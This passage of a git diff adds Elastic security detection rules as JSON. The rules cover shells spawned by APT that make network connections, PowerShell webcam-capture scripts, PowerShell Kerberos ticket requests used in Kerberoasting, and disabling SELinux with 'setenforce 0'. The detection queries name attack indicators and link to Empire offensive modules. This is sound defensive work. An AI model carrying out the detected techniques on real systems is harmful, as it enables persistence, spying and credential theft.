+ "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1.json b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1.json new file mode 100644 index 00000000000..d76bee38a99 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Network Connection", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 1 + }, + "id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2.json b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2.json new file mode 100644 index 00000000000..4a08a5d888e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Network Connection", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 2 + }, + "id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_3.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_3.json new file mode 100644 index 00000000000..e77f861946e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_3.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can be used to record webcam video. Attackers can capture this information to extort or spy on victims.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Webcam Video Capture Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"NewFrameEventHandler\" or\n \"VideoCaptureDevice\" or\n \"DirectX.Capture.Filters\" or\n \"VideoCompressors\" or\n \"Start-WebcamRecorder\" or\n (\n (\"capCreateCaptureWindowA\" or\n \"capCreateCaptureWindow\" or\n \"capGetDriverDescription\") and\n (\"avicap32.dll\" or \"avicap32\")\n )\n )\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/collection/WebcamRecorder.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1125", + "name": "Video Capture", + "reference": "https://attack.mitre.org/techniques/T1125/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "eb44611f-62a8-4036-a5ef-587098be6c43_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_4.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_4.json new file mode 100644 index 00000000000..48011719ead --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_4.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can be used to record webcam video. Attackers can capture this information to extort or spy on victims.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Webcam Video Capture Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"NewFrameEventHandler\" or\n \"VideoCaptureDevice\" or\n \"DirectX.Capture.Filters\" or\n \"VideoCompressors\" or\n \"Start-WebcamRecorder\" or\n (\n (\"capCreateCaptureWindowA\" or\n \"capCreateCaptureWindow\" or\n \"capGetDriverDescription\") and\n (\"avicap32.dll\" or \"avicap32\")\n )\n )\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/collection/WebcamRecorder.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1125", + "name": "Video Capture", + "reference": "https://attack.mitre.org/techniques/T1125/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "eb44611f-62a8-4036-a5ef-587098be6c43_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111.json new file mode 100644 index 00000000000..b348b59162d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that have the capability of requesting kerberos tickets, which is a common step in Kerberoasting toolkits to crack service accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Kerberos Ticket Request", + "note": "## Triage and analysis\n\n### Investigating PowerShell Kerberos Ticket Request\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available for use in various environments, creating an attractive way for attackers to execute code.\n\nAccounts associated with a service principal name (SPN) are viable targets for Kerberoasting attacks, which use brute force to crack the user password, which is used to encrypt a Kerberos TGS ticket.\n\nAttackers can use PowerShell to request these Kerberos tickets, with the intent of extracting them from memory to perform Kerberoasting.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Validate if the account has an SPN associated with it.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review event ID [4769](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769) related to this account and service name for additional information.\n\n### False positive analysis\n\n- A possible false positive can be identified if the script content is not malicious/harmful or does not request Kerberos tickets for user accounts, as computer accounts are not vulnerable to Kerberoasting due to complex password requirements and policy.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n KerberosRequestorSecurityToken\n ) and not user.id : (\"S-1-5-18\" or \"S-1-5-20\") and\n not powershell.file.script_block_text : (\n (\"sentinelbreakpoints\" and (\"Set-PSBreakpoint\" or \"Set-HookFunctionTabs\")) or\n (\"function global\" and \"\\\\windows\\\\sentinel\\\\4\")\n )\n", + "references": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108.json new file mode 100644 index 00000000000..66468d2dc1f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of SELinux", + "query": "process where host.os.type == \"linux\" and event.type in (\"start\", \"process_started\") and\nprocess.name == \"setenforce\" and process.args == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109.json new file mode 100644 index 00000000000..fa9407afffd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_109.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of SELinux", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"setenforce\" and process.args == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat 